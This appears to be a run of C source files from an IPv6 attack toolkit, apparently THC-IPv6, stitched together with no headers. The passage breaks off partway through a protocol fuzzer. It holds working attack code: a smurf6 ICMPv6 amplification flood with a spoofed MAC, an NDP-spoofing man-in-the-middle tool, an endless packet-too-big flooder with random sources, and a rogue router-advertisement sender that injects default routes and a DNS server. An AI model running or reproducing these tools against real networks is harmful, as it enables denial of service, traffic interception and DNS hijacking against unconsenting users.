int main(int argc, char *argv[]) {
int i;
char *glob;
if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
while ((i = getopt(argc, argv, "Dsm:R:")) >= 0) {
switch (i) {
case 'm':
maxhop = atoi(optarg);
break;
case 'D':
do_dst = 1;
break;
case 's':
noverb = 1;
break;
case 'R':
if ((ll = index(optarg, '/')) != NULL)
*ll = 0;
replace = thc_resolve6(optarg);
break;
default:
fprintf(stderr, "Error: invalid option %c\n", i);
exit(-1);
}
}
if (argc - optind < 1 || argc - optind > 2)
help(argv[0]);
interface = argv[optind];
if (argc == optind + 2)
script = argv[optind + 1];
memset(d, 0, sizeof(d));
_thc_ipv6_showerrors = 0;
// we dont want our own address in the discovered addresses
glob = thc_get_own_ipv6(interface, NULL, PREFER_GLOBAL);
ll = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
memcpy(hostpart, ll + 8, 8);
if (memcmp(ll + 8, glob + 8, 8) != 0) { // do we have a global address with a different host part?
memcpy(d[0], glob, 16);
dcnt = 1;
}
if (do_dst < 255 && do_dst)
fprintf(stderr, "Warning: it does not make sense to use the -m and -D options together!\n");
if (noverb == 0)
printf("Started IPv6 passive system detection (Press Control-C to end) ...\n");
return thc_pcap_function(interface, "ip6", (char *) detect, 1, NULL);
return 0; // never reached
}
int main(int argc, char *argv[]) {
unsigned char *pkt = NULL, buf[16], fakemac[7] = "\x00\x00\xde\xad\xbe\xef";
unsigned char *multicast6, *victim6;
int pkt_len = 0;
char *interface;
int rawmode = 0;
if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (strcmp(argv[1], "-r") == 0) {
thc_ipv6_rawmode(1);
rawmode = 1;
argv++;
argc--;
}
interface = argv[1];
if (thc_get_own_ipv6(interface, NULL, PREFER_GLOBAL) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", interface);
exit(-1);
}
victim6 = thc_resolve6(argv[2]);
if (argv[3] != NULL)
multicast6 = thc_resolve6(argv[3]);
else
multicast6 = thc_resolve6("ff02::1");
memset(buf, 'A', 16);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, victim6, multicast6, 0, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &buf, 16, 0) < 0)
return -1;
if (thc_generate_pkt(interface, fakemac, NULL, pkt, &pkt_len) < 0) {
fprintf(stderr, "Error: Can not generate packet, exiting ...\n");
exit(-1);
}
printf("Starting smurf6 attack against %s (Press Control-C to end) ...\n", argv[2]);
while (1)
thc_send_pkt(interface, pkt, &pkt_len);
return 0;
}
int main(int argc, char *argv[]) {
if (argc < 4) {
printf("code by Fabricio Nogueira Buzeto and Carlos Botelho De Paula Filho\nCode based on thc-ipv6\n\n");
printf("Syntax: %s interface target1 target2\n\n", argv[0]);
printf("NDP spoof between target1 and target2 to perform a man-in-the-middle attack.\n");
exit(-1);
}
memset((char*)&mArgs, 0, sizeof(mArgs));
mArgs.interface = argv[1];
mArgs.ipAddrVic1 = thc_resolve6(argv[2]);
mArgs.macAddrVic1 = thc_get_mac(argv[1], NULL, mArgs.ipAddrVic1);
mArgs.ownMac = thc_get_own_mac(argv[1]);
mArgs.ownIp = thc_get_own_ipv6(argv[1], mArgs.ipAddrVic1, PREFER_LINK);
mArgs.twoVics = 1;
mArgs.ipAddrVic2 = thc_resolve6(argv[3]);
mArgs.macAddrVic2 = thc_get_mac(argv[1], NULL, mArgs.ipAddrVic2);
if (mArgs.ownIp == NULL) {
fprintf(stderr, "ERROR: Invalid interface: %s\n", argv[1]);
exit(-1);
}
if (mArgs.macAddrVic1 == NULL) {
fprintf(stderr, "ERROR: Invalid target1: %s\n", argv[2]);
exit(-1);
}
if (mArgs.macAddrVic2 == NULL) {
fprintf(stderr, "ERROR: Invalid target2: %s\n", argv[3]);
exit(-1);
}
spoofer(mArgs);
printf("\nPress Control-C to end MITM spoofing...\n");
while(1) sleep(1);
}
int main(int argc, char *argv[]) {
char *interface, *ptr, buf2[8];
unsigned char *dst = NULL, *dstmac = NULL, *src = NULL, *srcmac = NULL;
int i, offset = 14, type = ICMP6_TOOBIG, alert = 0, randsrc = 0, do_crc = 1, maxsize = 160;
unsigned char *pkt = NULL, ip6[8];
int pkt_len = 0, count = 0;
thc_ipv6_hdr *hdr;
unsigned int filler = IDS_STRING, mychecksum;
unsigned char offender[1452] = { 0x60, 0x00, 0x00, 0x00, 0x01, 0xcd, 0x3a, 0x3f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x20, 0x03, 0x00, 0x04, 0x00, 0x04, 0x00, 0x04,
0x00, 0x04, 0x00, 0x04, 0x00, 0x04, 0x00, 0x04,
0x80, 0x00, 0xed, 0xc5, 0xfa, 0xce, 0xba, 0xbe,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41 };
if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
srand(time(NULL) + getpid());
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
while ((i = getopt(argc, argv, "acpPTUrRs:m")) >= 0) {
switch(i) {
case 'a':
alert = 8;
break;
case 'c':
do_crc = 0;
break;
case 'm':
maxsize = -1;
break;
case 'p':
type = ICMP6_ECHOREQUEST;
break;
case 'P':
type = ICMP6_ECHOREPLY;
break;
case 'T':
type = ICMP6_TTLEXEED;
break;
case 'U':
type = ICMP6_UNREACH;
break;
case 'r':
randsrc = 8;
break;
case 'R':
randsrc = 1;
break;
case 's':
src = thc_resolve6(optarg);
break;
default:
fprintf(stderr, "Error: unknown option -%c\n", i);
exit(-1);
}
}
if (argc - optind < 2)
help(argv[0]);
interface = argv[optind];
if ((ptr = index(argv[optind + 1], '/')) != NULL)
*ptr = 0;
if ((dst = thc_resolve6(argv[optind + 1])) == NULL) {
fprintf(stderr, "Error: Can not resolve %s\n", argv[optind + 1]);
exit(-1);
}
if ((srcmac = thc_get_own_mac(interface)) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", interface);
exit(-1);
}
if (src == NULL)
if ((src = thc_get_own_ipv6(interface, dst, PREFER_GLOBAL)) == NULL || (src[0] == 0xfe && src[1] == 0x80)) {
fprintf(stderr, "Error: no global IPv6 address configured on interface %s\n", interface);
exit(-1);
}
if ((dstmac = thc_get_mac(interface, src, dst)) == NULL) {
fprintf(stderr, "Error: can not find a route to target %s\n", argv[2]);
exit(-1);
}
if (maxsize == -1)
maxsize = thc_get_mtu(interface) - 48 - alert;
if (maxsize > sizeof(offender))
maxsize = sizeof(offender);
for (i = 0; i < ((sizeof(offender) - 48) / 4); i++)
memcpy(offender + 48 + i*4, (char*) &filler + _TAKE4, 4);
memcpy(offender + 8, dst, 16);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 255, 0, 0, 0, 0)) == NULL)
return -1;
if (alert) {
memset(buf2, 0, sizeof(buf2));
buf2[0] = 5;
buf2[1] = 2;
if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, 6) < 0)
return -1;
}
if (thc_add_icmp6(pkt, &pkt_len, type, 0, 1280, offender, maxsize, 0) < 0)
return -1;
if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
hdr = (thc_ipv6_hdr *) pkt;
if (do_hdr_size)
offset = do_hdr_size;
printf("Starting to flood target network with toobig %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface);
while (1) {
for (i = 4; i < 8; i++)
ip6[i] = rand() % 256;
memcpy(hdr->pkt + offset + 32 + 4, ip6 + 4, 4);
memcpy(hdr->pkt + offset + 40 + 8 + 8 + 8 + 4 + alert, ip6 + 4, 4);
if (randsrc) {
for (i = randsrc; i < 16; i++)
hdr->pkt[offset + 8 + i] = rand() % 256;
}
if (do_crc) {
hdr->pkt[offset + 42 + alert] = 0;
hdr->pkt[offset + 43 + alert] = 0;
mychecksum = checksum_pseudo_header(hdr->pkt + offset + 8, hdr->pkt + offset + 24, NXT_ICMP6, hdr->pkt + offset + 40 + alert, pkt_len - offset - 40 - alert);
hdr->pkt[offset + 42 + alert] = mychecksum / 256;
hdr->pkt[offset + 43 + alert] = mychecksum % 256;
}
while (thc_send_pkt(interface, pkt, &pkt_len) < 0)
usleep(1);
count++;
if (count % 1000 == 0)
printf(".");
}
return 0;
}
int main(int argc, char *argv[]) {
char *routerip, *interface, mac[16] = "";
unsigned char *routerip6, *route6, *mac6 = mac, *ip6;
unsigned char buf[512], *ptr, buf2[6], string[] = "ip6 and icmp6 and dst ff02::2";
unsigned char *dst = thc_resolve6("ff02::1");
unsigned char *dstmac = thc_get_multicast_mac(dst);
unsigned char *dns;
int size, mtu = 1500, i, j, k, cnt;
unsigned char *pkt = NULL;
int pkt_len = 0;
int rawmode = 0;
pcap_t *p;
if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
while ((i = getopt(argc, argv, "FHDr")) >= 0) {
switch (i) {
case 'r':
thc_ipv6_rawmode(1);
rawmode = 1;
break;
case 'F':
do_frag++;
break;
case 'H':
do_hop = 1;
break;
case 'D':
do_dst = 1;
break;
default:
fprintf(stderr, "Error: invalid option %c\n", i);
exit(-1);
}
}
if (argc - optind < 2)
help(argv[0]);
if (do_hdr_size)
myoff = do_hdr_size;
frbuf = buf;
frbuf2 = buf2;
frbuf2len = sizeof(buf2);
memset(mac, 0, sizeof(mac));
interface = argv[optind];
mtu = thc_get_mtu(interface);
if (argc - optind >= 5)
mtu = atoi(argv[optind + 4]);
if (argc - optind >= 7 && (ptr = argv[optind + 5]) != NULL)
sscanf(ptr, "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4],
(unsigned int *) &mac[5]);
else
mac6 = thc_get_own_mac(interface);
if (argc - optind >= 4 && argv[optind + 3] != NULL)
ip6 = thc_resolve6(argv[optind + 3]);
else
ip6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
frip6 = ip6;
frint = interface;
frmac = mac6;
if (argc - optind >= 4 && argv[optind + 2] != NULL)
dns = thc_resolve6(argv[optind + 2]);
else
dns = thc_resolve6("ff02::fb");
routerip = argv[optind + 1];
if (routerip == NULL || (ptr = index(routerip, '/')) == NULL) {
printf("Error: Option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. ff80::01/16\n");
exit(-1);
}
*ptr++ = 0;
size = atoi(ptr);
routerip6 = thc_resolve6(routerip);
route6 = thc_resolve6(routerip);
if (routerip6 == NULL || size < 1 || size > 128) {
fprintf(stderr, "Error: IP-ADDRESS/PREFIXLENGTH argument is invalid: %s\n", argv[optind + 1]);
exit(-1);
}
if (size < 48 || size > 64)
fprintf(stderr, "Warning: unusual network prefix size defined, be sure what your are doing: %d\n", size);
if (dns == NULL) {
fprintf(stderr, "Error: dns argument is invalid: %s\n", argv[optind + 2]);
exit(-1);
}
if (ip6 == NULL) {
fprintf(stderr, "Error: link-local-ip6 argument is invalid: %s\n", argv[optind + 3]);
exit(-1);
}
if (mtu < 1 || mtu > 65536) {
fprintf(stderr, "Error: mtu argument is invalid: %s\n", argv[optind + 4]);
exit(-1);
}
if (mtu < 1228 || mtu > 1500)
fprintf(stderr, "Warning: unusual mtu size defined, be sure what you are doing :%d\n", mtu);
if (mac6 == NULL) {
fprintf(stderr, "Error: mac address in invalid\n");
exit(-1);
}
memset(buf, 0, sizeof(buf));
memset(buf2, 0, sizeof(buf2));
memset(buf3, 0, sizeof(buf3));
if ((p = thc_pcap_init(interface, string)) == NULL) {
fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
exit(-1);
}
i = 128 - size;
j = i / 8;
k = i % 8;
if (k > 0)
j++;
memset(route6 + 16 - j, 0, j);
if (k > 0)
route6[17 - j] = (route6[17 - j] >> (8 - k)) << (8 - k);
// buf[3] = 250; // 0-3: reachable timer
buf[6] = 4; // 4-7: retrans timer
// option mtu
buf[8] = 5;
buf[9] = 1;
buf[12] = mtu / 16777216;
buf[13] = (mtu % 16777216) / 65536;
buf[14] = (mtu % 65536) / 256;
buf[15] = mtu % 256;
// option prefix
buf[16] = 3;
buf[17] = 4;
buf[18] = size; // prefix length
buf[19] = 128 + 64;
memset(&buf[20], 17, 4);
memset(&buf[24], 4, 4);
memcpy(&buf[32], route6, 16);
i = 48;
// mac address option
buf[i++] = 1;
buf[i++] = 1;
memcpy(buf + i, mac6, 6);
i += 6;
// default route routing option
buf[i++] = 0x18; // routing entry option type
buf[i++] = 0x03; // length 3 == 24 bytes
buf[i++] = 0x00; // prefix length
buf[i++] = 0x08; // priority, highest of course
i += 2; // 52-53 unknown
buf[i++] = 0x11; // lifetime, word
buf[i++] = 0x11; // lifetime, word
i += 16; // 56-71 address, all zeros for default
// specific route routing option 2000::/3
buf[i++] = 0x18; // routing entry option type
buf[i++] = 0x03; // length 3 == 24 bytes
buf[i++] = 0x03; // prefix length
buf[i++] = 0x08; // priority, highest of course
i += 2; // 52-53 unknown
buf[i++] = 0x11; // lifetime, word
buf[i++] = 0x11; // lifetime, word
buf[i++] = 0x20; // 56-71 address: 2000::
i += 15;
// specific route routing option 2000::/3
buf[i++] = 0x18; // routing entry option type
buf[i++] = 0x03; // length 3 == 24 bytes
buf[i++] = 0x07; // prefix length
buf[i++] = 0x08; // priority, highest of course
i += 2; // 52-53 unknown
buf[i++] = 0x11; // lifetime, word
buf[i++] = 0x11; // lifetime, word
buf[i++] = 0xfc; // 56-71 address: fc::
i += 15;
// dns option
buf[i++] = 0x19; // dns option type
buf[i++] = 0x03; // length
i += 2; // 74-75 reserved
memset(buf + i, 1, 4); // validity time
i += 4;
memcpy(buf + i, dns, 16); // dns server
i += 16;
frbuflen = i;
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0xe0, 0)) == NULL)
return -1;
if (do_hop) {
type = NXT_HBH;
if (thc_add_hdr_hopbyhop(pkt, &pkt_len, frbuf2, 6) < 0)
return -1;
}
if (do_frag) {
type = NXT_FRAG;
for (i = 0; i <= do_frag; i++)
if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, cnt++) < 0)
return -1;
}
if (do_dst) {
if (type == NXT_ICMP6)
type = NXT_DST;
if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0)
return -1;
}
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0xff080800, buf, i, 0) < 0)
return -1;
if (thc_generate_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0)
return -1;
frhdr = (thc_ipv6_hdr *) pkt;
// init pcap
printf("Starting to advertise router %s (Press Control-C to end) ...\n", argv[optind + 1]);
while (1) {
if (do_dst) {
thc_send_as_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1240);
} else {
thc_send_pkt(interface, pkt, &pkt_len);
}
while (thc_pcap_check(p, (char *) send_rs_reply, NULL) > 0);
sleep(5);
}
return 0;
}
int main(int argc, char *argv[]) {
unsigned char *pkt = NULL, *pkt_bak, *mcast6, *someaddr6 = NULL;
unsigned char *dst6, *src6 = NULL, *mac = NULL, *routers[2], string[64] = "ip6 and dst ";
int test_start = 0, fragment = 0, alert = 0, sroute = 0;
int do_type = DO_PING, do_alive = 1, hopbyhop = 0, destination = 0, jumbo = 0;
int pkt_len = 0, offset = 0, test_current = 0, i, j, k, do_fuzz = 1, test_ptr = 0;
int test_end = TEST_MAX, ping = NEVER, frag_offset = 0, header = 0, no_send = 1;
int test_pos = 0, test_cnt = 0, do_it, extend = 0, mtu = 1500, size = 64, wait = 0, off2 = 14;
char *interface, fuzzbuf[256], *srcmac, *dns, *route6, *real_dst6 = NULL;
unsigned char buf[256], buf2[100], buf3[16];
unsigned short int *sip;
pcap_t *p;
thc_ipv6_hdr *hdr;
if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
while ((i = getopt(argc, argv, "s:0123456789Xxt:T:p:FSDHRIJan:")) >= 0) {
switch (i) {
case 's':
do_type = DO_TCP;
port = atoi(optarg);
break;
case '0':
do_type = DO_NODEQUERY;
break;
case '1':
do_type = DO_PING;
break;
case '2':
do_type = DO_NEIGHSOL;
break;
case '3':
do_type = DO_NEIGHADV;
break;
case '4':
do_type = DO_RA;
break;
case '5':
do_type = DO_MLD_REP;
break;
case '6':
do_type = DO_MLD_DONE;
break;
case '7':
do_type = DO_MLD_QUERY;
wait = 0xff0000;
break;
case '8':
do_type = DO_MLD2_REPORT;
break;
case '9':
do_type = DO_MLD2_QUERY;
wait = 0xff0000;
break;
case 'X':
do_type = DO_NONE;
break;
case 't':
test_start = atoi(optarg);
break;
case 'T':
test_end = test_start = atoi(optarg);
break;
case 'p':
ping = atoi(optarg);
break;
case 'a':
do_alive = 0;
break;
case 'S':
sroute = 1;
break;
case 'n':
no_send = atoi(optarg);
break;
case 'F':
fragment = 1;
break;
case 'R':
alert = 1;
break;
case 'D':
destination = 1;
break;
case 'H':
hopbyhop = 1;
break;
case 'J':
jumbo = 1;
break;
case 'I':
header = 1;
break;
case 'x':
extend = 1;
break;
}
}
if (argc - optind < 2) {
fprintf(stderr, "ERROR: not enough options, interface and target address are required!\n");
exit(-1);
}
interface = argv[optind];
if ((srcmac = thc_get_own_mac(interface)) == NULL) {
fprintf(stderr, "ERROR: %s is not a valid interface which has a MAC, use raw mode?\n", interface);
exit(-1);
}
if (no_send < 1) {
fprintf(stderr, "ERROR: -n number must be between one and 2 billion\n");
exit(-1);
}
if (do_hdr_size) {
test_pos -= do_hdr_size;
offset -= do_hdr_size;
off2 = do_hdr_size;
}
if (do_type != DO_PING && do_type != DO_TCP && do_type != DO_NONE) {
if ((mcast6 = thc_resolve6(argv[optind + 1])) == NULL) {
fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[optind + 1]);
exit(-1);
}
if (do_type == DO_NEIGHSOL) {
dst6 = thc_resolve6("ff02::0001:ff00:0000");
memcpy(dst6 + 13, mcast6 + 13, 3);
} else
dst6 = thc_resolve6("ff02::1");
} else {
dst6 = thc_resolve6(argv[optind + 1]);
}
if (argv[optind + 1] != NULL)
if ((real_dst6 = thc_resolve6(argv[optind + 1])) == NULL) {
fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[optind + 1]);
exit(-1);
}
if (interface == NULL || argv[optind + 1] == NULL) {
printf("Error: interface and target-ipv6-address are mandatory command line options\n");
exit(-1);
}
if (ping < 1 || test_end < test_start) {
printf("don't f**k up the command line options!\n");
exit(-1);
}
if (argv[optind + 2] != NULL)
someaddr6 = thc_resolve6(argv[optind + 2]);
if (argc - optind > 3) {
printf("Error: too many command line options\n");
exit(-1);
}
if ((mac = thc_get_mac(interface, src6, dst6)) == NULL) {
fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]);
exit(-1);
}
if (do_type == DO_PING || do_type == DO_TCP || do_type == DO_NONE)
src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL);
else
src6 = thc_get_own_ipv6(interface, dst6, PREFER_LINK);
if (src6 == NULL) {
fprintf(stderr, "Error: no IPv6 address configured on interface %s\n", interface);
exit(-1);
}
strcat(string, thc_ipv62notation(src6));
if (sroute) {
if (someaddr6 != NULL)
routers[0] = someaddr6;
else
routers[0] = dst6;
routers[1] = NULL;
}
setvbuf(stdout, NULL, _IONBF, 0);
memset(buf, 0, sizeof(buf));
memset(buf2, 0, sizeof(buf2));
dns = thc_resolve6("ff02::fb");
route6 = thc_resolve6("2a01::");
if ((p = thc_pcap_init(interface, string)) == NULL) {
fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
exit(-1);
}
if (real_dst6 != NULL && real_dst6[0] == 0xff)
do_alive = 0;
// ping before to check if it works
if (do_alive)
if (check_alive(p, interface, srcmac, mac, src6, real_dst6) == 0) {
// fprintf(stderr, "Error: target %s is not alive via direct ping6!\n", argv[optind + 1]);
// exit(-1);
}
// generate basic packet
strcpy(fuzzbuf, fuzztype_ether);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL)
return -1;
if (header)
strcat(fuzzbuf, fuzztype_ip6);
else
strcat(fuzzbuf, fuzztype_ip6no);
if (alert || hopbyhop || jumbo) {
memset(buf2, 0, sizeof(buf2));
i = 0;
if (alert) {
buf2[i++] = 5;
buf2[i++] = 2;
i += 2;
strcat(fuzzbuf, ".F.F");
}
if (jumbo) {
buf2[i++] = 0xc2;
buf2[i++] = 4;
buf2[i++] = 'J'; // lookup code
buf2[i++] = 'J';
buf2[i++] = 'J';
buf2[i++] = 'J';
strcat(fuzzbuf, ".FBBBB");
}
if (hopbyhop) {
memset(buf3, 0, sizeof(buf3));
buf3[0] = 'X';
buf3[1] = '.';
for (j = 0; j < 10; j++) {
buf2[i++] = 1; // PadN, length
buf2[i++] = j;
if (j > 0) {
memset(buf2 + i, 0xaa, j);
buf3[2 + j] = '.';
i += j;
}
strcat(fuzzbuf, buf3); // always: X... for every new option
}
}
if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, i) < 0)
return -1;
i += 2;
if (i % 8 > 0)
i = ((i / 8) + 1) * 8;
offset += i;
}
if (sroute) {
if (thc_add_hdr_route(pkt, &pkt_len, routers, 1) < 0)
return -1;
else {
strcat(fuzzbuf, "FFFFBBBB................");
offset += 24;
}
}
if (fragment) {
frag_offset = offset;
if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, 0) < 0)
return -1;
else {
strcat(fuzzbuf, "FFWW..");
offset += 8;
}
}
if (destination) {
memset(buf2, 0, sizeof(buf2));
memset(buf3, 0, sizeof(buf3));
buf3[0] = 'X';
buf3[1] = '.';
i = 0;
for (j = 0; j < 10; j++) {
buf2[i++] = 1; // PadN, length
buf2[i++] = j;
if (j > 0) {
memset(buf2 + i, 0xaa, j);
buf3[2 + j] = '.';
i += j;
}
strcat(fuzzbuf, buf3); // always: X... for every new option
}
if (thc_add_hdr_dst(pkt, &pkt_len, buf2, i) < 0)
return -1;
i += 2;
if (i % 8 > 0)
i = ((i / 8) + 1) * 8;
offset += i;
}
memset(buf, 0, sizeof(buf));
// if (header)
strcat(fuzzbuf, fuzztype_icmp6);
// else
// strcat(fuzzbuf, fuzztype_icmp6no);
switch (do_type) {
case DO_TCP:
// tcp options
buf[0] = 2; // max segment size
buf[1] = 4;
buf[2] = 255;
buf[3] = 255;
buf[4] = 3; // windows size
buf[5] = 3;
buf[6] = 62;
buf[7] = 1; // padding
buf[8] = 8; // timestamp
buf[9] = 10;
buf[10] = time(NULL) / 16777216;
buf[11] = ((time(NULL) / 65536) % 256);
buf[12] = ((time(NULL) / 256) % 256);
buf[13] = time(NULL) % 256;
// 4 bytes ack tstamp 00000000
// rest is padding (2 bytes)
if (thc_add_tcp(pkt, &pkt_len, 65532, port, test_current, 0, TCP_SYN, 5760, 0, (unsigned char *) buf, 20, (unsigned char *) buf, 20) < 0)
return -1;
strcat(fuzzbuf, fuzztype_tcp);
break;
case DO_PING:
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, test_current, (unsigned char *) &buf, 16, 0) < 0)
return -1;
strcat(fuzzbuf, fuzztype_icmp6ping);
break;
case DO_NONE:
// empty
break;
case DO_NEIGHSOL:
if (someaddr6 != NULL)
memcpy(buf, someaddr6, 16);
else
memcpy(buf, mcast6, 16);
buf[16] = 1;
buf[17] = 1;
memcpy(buf + 18, srcmac, 6);
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORSOL, 0, 0, (unsigned char *) &buf, 24, 0) < 0)
return -1;
strcat(fuzzbuf, fuzztype_icmp6ns);
break;
case DO_NEIGHADV:
if (someaddr6 != NULL)
memcpy(buf, someaddr6, 16);
else
memcpy(buf, src6, 16);
buf[16] = 2;
buf[17] = 1;
memcpy(buf + 18, srcmac, 6);
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORADV, 0, 0xe0000000, (unsigned char *) &buf, 24, 0) < 0)
return -1;
strcat(fuzzbuf, fuzztype_icmp6na);
break;
case DO_NODEQUERY:
memcpy(buf + 8, real_dst6, 16);
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NODEQUERY, 0, 0x0003003e, (unsigned char *) &buf, 24, 0) < 0)
return -1;
strcat(fuzzbuf, fuzztype_icmp6nq);
break;
case DO_RA:
// buf[3] = 250; // 0-3: reachable timer
buf[6] = 4; // 4-7: retrans timer
// option mtu
buf[8] = 5;
buf[9] = 1;
buf[12] = mtu / 16777216;
buf[14] = (mtu % 65536) / 256;
buf[15] = mtu % 256;
// option prefix
buf[16] = 3;
buf[17] = 4;
buf[18] = size; // prefix length
buf[19] = 128 + 64;
memset(&buf[20], 17, 4);
memset(&buf[24], 4, 4);
if (someaddr6 != NULL)
memcpy(&buf[32], someaddr6, 16);
else
memcpy(&buf[32], route6, 16);
i = 48;
// mac address option
buf[i++] = 1;
buf[i++] = 1;
memcpy(buf + i, srcmac, 6);
i += 6; // = 8 == 56
// default route routing option
buf[i++] = 0x18; // routing entry option type
buf[i++] = 0x03; // length 3 == 24 bytes
buf[i++] = 64; // prefix length /64
buf[i++] = 0x08; // priority, highest of course
i += 2; // 52-53 unknown
buf[i++] = 0x11; // lifetime, word
buf[i++] = 0x11; // lifetime, word
buf[i++] = 0x20;
buf[i++] = 4; // 56-71 address, 2004:: for default
i += 14; // = 24 == 70
// dns option
buf[i++] = 0x19; // dns option type
buf[i++] = 0x03; // length
i += 2; // 74-75 reserved
memset(buf + i, 1, 4); // validity time
i += 4;
if (someaddr6 != NULL)
memcpy(buf + i, someaddr6, 16); // dns server
else
memcpy(buf + i, dns, 16); // dns server
i += 16; // = 24 == 94
// seachlist option
buf[i++] = 31;
buf[i++] = 4;
i += 2;
memset(buf + i, 1, 4); // validity time
i += 4;
buf[i++] = 3;
memcpy(buf + i, "foo", 3);
i += 3;
buf[i++] = 4;
memcpy(buf + i, "corp", 4);
i += 5; // + null byte
buf[i++] = 5;
memcpy(buf + i, "local", 5);
i += 5;
buf[i++] = 6;
memcpy(buf + i, "domain", 6);
i += 7; // + null byte
// = 32 == 126
// flag extension option
buf[i++] = 26;
buf[i++] = 1;
buf[i++] = 0x08;
i += 5;
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0xff080800, buf, i, 0) < 0)
return -1;
strcat(fuzzbuf, fuzztype_icmp6ra);
break;
case DO_MLD_QUERY:
case DO_MLD_DONE:
case DO_MLD_REP:
buf[0] = 0xff;
buf[1] = 0x02;
buf[15] = 0x05;
if (someaddr6 != NULL)
memcpy(buf, someaddr6, 16);
if (thc_add_icmp6(pkt, &pkt_len, do_type, 0, wait, buf, 16, 0) < 0)
return -1;
strcat(fuzzbuf, fuzztype_icmp6mld);
break;
case DO_MLD2_QUERY:
buf[0] = 0xff;
buf[1] = 0x02;
buf[15] = 0x05;
if (someaddr6 != NULL)
memcpy(buf, someaddr6, 16);
buf[16] = 7;
buf[17] = 120;
buf[19] = 3;
memcpy(buf + 20, dst6, 16);
memcpy(buf + 36, buf, 16);
if (thc_add_icmp6(pkt, &pkt_len, DO_MLD_QUERY, 0, wait, buf, 68, 0) < 0)
return -1;
strcat(fuzzbuf, fuzztype_icmp6mld2que);
break;
case DO_MLD2_REPORT:
for (i = 0; i < 3; i++) {
buf[0 + 68 * i] = 1 + i * 2 - i / 2; //include new++, generates 1, 3 and 4
buf[3 + 68 * i] = 3; //3 sources
buf[4 + 68 * i] = 0xff;
buf[5 + 68 * i] = 0x02;
buf[18 + 68 * i] = 0x82 + i % 256;
buf[19 + 68 * i] = 0xff;
memcpy(buf + 20 + 68 * i, src6, 16);
buf[36 + 68 * i] = 0xfe;
buf[37 + 68 * i] = 0x80;
buf[46 + 68 * i] = 0xf0;
if (someaddr6 != NULL)
memcpy(buf + 52 + 68 * i, someaddr6, 16);
}
if (thc_add_icmp6(pkt, &pkt_len, do_type, 0, 3, buf, 208, 0) < 0)
return -1;
strcat(fuzzbuf, fuzztype_icmp6mld2rep);
break;
default:
fprintf(stderr, "ERROR: Mode not implemented yet!\n");
exit(-1);
}
if (thc_generate_pkt(interface, srcmac, mac, pkt, &pkt_len) < 0)
return -1;
